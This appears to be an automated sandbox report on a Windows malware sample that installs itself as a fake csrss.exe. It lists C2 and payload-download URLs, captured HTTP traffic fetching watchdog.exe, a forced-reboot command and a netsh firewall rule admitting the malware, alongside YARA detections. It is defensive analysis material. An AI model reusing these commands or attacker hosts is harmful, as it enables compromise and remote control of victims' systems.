            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
            Source: csrss.exeString found in binary or memory: http://gais.cs.ccu.edu.tw/robot.php)Gulper
            Source: csrss.exe, 00000008.00000003.413719925.00000000118F6000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/0281c43f36eb9f47aab5357d48bbc076
            Source: csrss.exe, 00000008.00000002.630186142.00000000118DC000.00000004.00000001.sdmpString found in binary or memory: http://gohnot.com/0281c43f36eb9f47aab5357d48bbc076/watchdog.exe
            Source: csrss.exeString found in binary or memory: http://grub.org)Mozilla/5.0
            Source: csrss.exeString found in binary or memory: http://help.ya
            Source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
            Source: csrss.exeString found in binary or memory: http://misc.yahoo.com.cn/he
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://newscommer.com/app/app.exe
            Source: csrss.exeString found in binary or memory: http://search.msn.com/msnb
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
            Source: csrss.exeString found in binary or memory: http://www.alexa.com/help/webmasters;
            Source: csrss.exeString found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
            Source: csrss.exeString found in binary or memory: http://www.baidu.com/search/spide
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
            Source: csrss.exeString found in binary or memory: http://www.bloglines.com)F
            Source: csrss.exeString found in binary or memory: http://www.everyfeed.c
            Source: csrss.exeString found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
            Source: csrss.exeString found in binary or memory: http://www.google.com/adsbot.html)Encountered
            Source: csrss.exeString found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
            Source: csrss.exeString found in binary or memory: http://www.google.com/bot.html)tls:
            Source: csrss.exeString found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
            Source: csrss.exeString found in binary or memory: http://www.googlebot.com/bot.html)Links
            Source: csrss.exeString found in binary or memory: http://www.spidersoft.com)Wget/1.9
            Source: csrss.exeString found in binary or memory: http://yandex.com/bots)Opera/9.51
            Source: csrss.exeString found in binary or memory: http://yandex.com/bots)Opera/9.80
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://blockchain.infoindex
            Source: csrss.exeString found in binary or memory: https://humisnee.com/sbmstart.phpindefinite
            Source: csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://logs.trumops.com
            Source: csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://logs.trumops.comhttps://runmodes.com/api/loghttps://server12.trumops.comDistributorIDCampaig
            Source: csrss.exeString found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:
            Source: f6oNLRKHUy.exe, 00000001.00000002.362354641.000000001186B000.00000004.00000001.sdmp, f6oNLRKHUy.exe, 00000003.00000002.372262046.00000000118DA000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.392222858.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000014.00000002.393591108.0000000011810000.00000004.00000001.sdmp, csrss.exe, 00000018.00000002.408613248.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000001B.00000002.409426862.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.428953235.0000000011810000.00000004.00000001.sdmpString found in binary or memory: https://retoti.com
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://retoti.comidentifier
            Source: csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://runmodes.com/api/log
            Source: csrss.exe, 00000008.00000002.630136783.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://runmodes.com/api/logGlobal
            Source: csrss.exe, 00000008.00000002.631653082.0000000011A9E000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.com
            Source: csrss.exe, 00000008.00000002.631627512.0000000011A98000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.com/api/cdn?c=177c2a906396ff21&uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460
            Source: csrss.exe, 00000008.00000002.629064382.000000001180A000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.com/api/poll
            Source: csrss.exe, 00000008.00000002.629064382.000000001180A000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.com/api/pollserver12.trumops.com
            Source: csrss.exe, 00000008.00000003.412773581.00000000119EA000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.com/bots/post-ia-data?uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460
            Source: csrss.exe, 00000008.00000002.631653082.0000000011A9E000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.comc=177c2a906396ff21&uuid=server12.trumops.com:443server12.trumops.com:443
            Source: csrss.exe, 00000008.00000002.631848636.0000000011ADC000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.comer:
            Source: csrss.exe, 00000008.00000002.629425005.0000000011850000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.comserver12.trumops.com:443onserver12.trumops.com:443tcpserver12.trumops.co
            Source: csrss.exe, 00000008.00000002.631242583.00000000119D6000.00000004.00000001.sdmp, csrss.exe, 00000008.00000002.631592443.0000000011A86000.00000004.00000001.sdmpString found in binary or memory: https://server12.trumops.comserver12.trumops.com:443server12.trumops.com:443tcpserver12.trumops.com
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://sitescore.aiValue
            Source: csrss.exe, 00000008.00000002.629425005.0000000011850000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.392222858.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000014.00000002.393591108.0000000011810000.00000004.00000001.sdmp, csrss.exe, 00000018.00000002.408613248.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000001B.00000002.409426862.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.428953235.0000000011810000.00000004.00000001.sdmpString found in binary or memory: https://trumops.com
            Source: csrss.exeString found in binary or memory: https://trumops.com/api/install-failureinvalid
            Source: f6oNLRKHUy.exe, 00000001.00000002.362274050.0000000011850000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS
            Source: csrss.exe, 00000008.00000002.630136783.00000000118D4000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.com
            Source: f6oNLRKHUy.exe, 00000001.00000002.362513862.0000000011892000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-1002
            Source: f6oNLRKHUy.exe, 00000003.00000002.372262046.00000000118DA000.00000004.00000001.sdmp, csrss.exe, 00000008.00000003.413843361.00000000118D4000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.392222858.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000014.00000002.393591108.0000000011810000.00000004.00000001.sdmp, csrss.exe, 00000018.00000002.408613248.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000001B.00000002.409426862.0000000011810000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.428953235.0000000011810000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic
            Source: f6oNLRKHUy.exe, 00000001.00000002.362354641.000000001186B000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta
            Source: csrss.exe, 00000010.00000002.392292944.0000000011814000.00000004.00000001.sdmp, csrss.exe, 00000014.00000002.393573476.000000001180C000.00000004.00000001.sdmp, csrss.exe, 00000018.00000002.408700688.00000000118CE000.00000004.00000001.sdmp, csrss.exe, 0000001B.00000002.409398397.000000001180C000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.429012789.0000000011814000.00000004.00000001.sdmpString found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://trumops.comif-unmodified-sinceillegal
            Source: csrss.exe, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)gentraceback
            Source: unknownHTTP traffic detected: POST /api/log HTTP/1.1Host: runmodes.comUser-Agent: Go-http-client/1.1Content-Length: 144Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
            Source: unknownDNS traffic detected: queries for: trumops.com
            Source: global trafficHTTP traffic detected: GET /api/cdn?c=177c2a906396ff21&uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460 HTTP/1.1Host: server12.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
            Source: global trafficHTTP traffic detected: GET /0281c43f36eb9f47aab5357d48bbc076/watchdog.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: 8cf49c60-c834-48e4-bacd-9cc30e6a4460Version: 183Accept-Encoding: gzip
            Source: windefender.exe, 00000025.00000002.433836098.0000000000B0A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            System Summary:

            Uses shutdown.exe to shutdown or reboot the system
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
            Source: f6oNLRKHUy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
            Source: 31.2.csrss.exe.9a76e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 20.2.csrss.exe.9af2e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.2.csrss.exe.9a76e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 1.2.f6oNLRKHUy.exe.9ad080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 1.2.f6oNLRKHUy.exe.9af2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 3.2.f6oNLRKHUy.exe.9a76e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 27.2.csrss.exe.9af2e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 8.2.csrss.exe.9af2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.2.csrss.exe.9ad080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 8.2.csrss.exe.9a76e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 20.2.csrss.exe.9a76e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 24.2.csrss.exe.9ad080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 1.2.f6oNLRKHUy.exe.9a76e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 38.2.csrss.exe.9a76e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 24.2.csrss.exe.9a76e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 27.2.csrss.exe.9a76e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 38.2.csrss.exe.9ad080.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 31.2.csrss.exe.9af2e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 24.2.csrss.exe.9af2e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 3.2.f6oNLRKHUy.exe.9ad080.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 38.2.csrss.exe.9af2e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 31.2.csrss.exe.9ad080.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 27.2.csrss.exe.9ad080.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 16.2.csrss.exe.9af2e0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 20.2.csrss.exe.9ad080.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 8.2.csrss.exe.9ad080.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: 3.2.f6oNLRKHUy.exe.9af2e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeFile created: C:\Windows\rss
            Source: bootmgfw.efi.8.drStatic PE information: No import functions for PE file found
            Source: bootx64.efi.8.drStatic PE information: No import functions for PE file found
            Source: EfiGuardDxe.efi.8.drStatic PE information: No import functions for PE file found
            Source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameHamakaze.exe( vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameWinmonFS.sysZ vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000001.00000002.359410341.00000000009FB000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamedsefix.exe. vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameDBGHELP.DLLj% vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamesymsrv.dllj% vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.368261402.00000000009FB000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamedsefix.exe. vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameWinmonFS.sysZ vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameDBGHELP.DLLj% vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamesymsrv.dllj% vs f6oNLRKHUy.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameHamakaze.exe( vs f6oNLRKHUy.exe
            Source: C:\Windows\SysWOW64\sc.exeProcess token adjusted: Security
            Source: f6oNLRKHUy.exeMetadefender: Detection: 31%
            Source: f6oNLRKHUy.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeFile read: C:\Users\user\Desktop\f6oNLRKHUy.exe
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\f6oNLRKHUy.exe 'C:\Users\user\Desktop\f6oNLRKHUy.exe'
            Source: unknownProcess created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess created: C:\Users\user\Desktop\f6oNLRKHUy.exe C:\Users\user\Desktop\f6oNLRKHUy.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
